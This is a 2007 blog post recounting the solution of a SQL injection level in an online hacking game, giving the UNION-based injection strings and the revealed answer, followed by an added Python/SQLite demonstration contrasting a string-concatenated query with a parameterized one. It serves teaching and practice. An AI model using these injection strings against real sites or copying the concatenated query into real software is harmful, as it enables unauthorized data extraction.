Saturday, August 18, 2007

Dare Your Mind

This evening I was approached by an internet drifter about a SQL injection problem. He was playing an online hacker game located at http://www.dareyourmind.net.

His problem was with the page http://www.dareyourmind.net/menu.php?page=sqlexploit3.

At first glance I thought "SQL exploit", then I read the information left by the author:

Listito has modified his girls contact php form to obtain fastly phone numbers... Because you have not the right session cookie, you cannot see phone list but you have to find even though the phone number of Nicole to validate this chall !

So my next thought was 'oh, session hijacking...TCP?....cookie...hmmm...XSS?'

The drifter assured me that I didn't have to try XSS, he'd found some SQL injection:

1 union all select *,null,null,null from information_schema.tables #

Which didn't quite work. I promised to take a look, and went off to dinner.

Once I returned, the first thing I did was open WebScarab and intercept all GETs and POSTs from my browser. Wow, this site was prepared. It tossed in lots of background noise, so I disabled the "GET" and focused only on POST, which is where the id=1 string was passed to http://www.dareyourmind.net/real/sql3/list.php. (Warning, this is hardly work safe!)

As it turns out, there are four columns. I was already told that much.

After little more than 30 minutes, the correct string is: (hidden, black text on black background, highlight below the 'spoiler' snips)

--SPOILER BELOW--

id=3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --

Which means the answer is: 1425753498 (though that will probably change when the author gets word that it has been posted.)

--SPOILER ABOVE--

No, I'm not trying to ruin the game. You should go figure out how each statement works, and how to SQL inject on your own. This is a spoiler for those lamers who can't figure it out. I won't post any more answers from the dareyourmind.net challenges, and I won't help you if you track me down. I was bored, this challenge was tempting...and it has been a while since I posted something.
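
Why the four-column UNION string above pulls a value out of a second table, why a three-column variant is rejected, and how binding the id as a parameter closes the hole. This is an added example, not code from the original post or from the challenge site. It assumes SQLite as a stand-in for the site's database; the `girls` table, its column names, the `Name` column and the phone value are constructed, and only `__User__SQL_THREE_`, `ID` and `Phone` come from the post.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; the listing table and its columns are hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE girls (ID INTEGER, Name TEXT, City TEXT, Age INTEGER);
        CREATE TABLE __User__SQL_THREE_ (ID INTEGER, Name TEXT, Phone TEXT);
        INSERT INTO girls VALUES (3, 'Nicole', 'Paris', 25);
        INSERT INTO __User__SQL_THREE_ VALUES (3, 'Nicole', '5550100');
    """)
    return db

def list_vulnerable(db, id_param):
    # The POSTed id is pasted into the SQL text, so it can append its own clauses.
    sql = "SELECT ID, Name, City, Age FROM girls WHERE ID = " + id_param
    return db.execute(sql).fetchall()

def list_parameterized(db, id_param):
    # The id is bound as a value; the statement's structure is fixed before it arrives.
    sql = "SELECT ID, Name, City, Age FROM girls WHERE ID = ?"
    return db.execute(sql, (id_param,)).fetchall()

def union_rejected(db, id_param):
    # True when the database refuses the query, e.g. on a UNION column-count mismatch.
    try:
        list_vulnerable(db, id_param)
        return False
    except sqlite3.OperationalError:
        return True

# The string from the post (four columns) and a three-column variant for comparison.
FOUR_COLS = "3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --"
THREE_COLS = "3 union select null,Phone,null from __User__SQL_THREE_ where ID = 3 --"

if __name__ == "__main__":
    db = make_db()
    print("concatenated, four columns :", list_vulnerable(db, FOUR_COLS))
    print("concatenated, three columns rejected:", union_rejected(db, THREE_COLS))
    print("bound parameter, same input:", list_parameterized(db, FOUR_COLS))
    print("bound parameter, plain id  :", list_parameterized(db, "3"))
```
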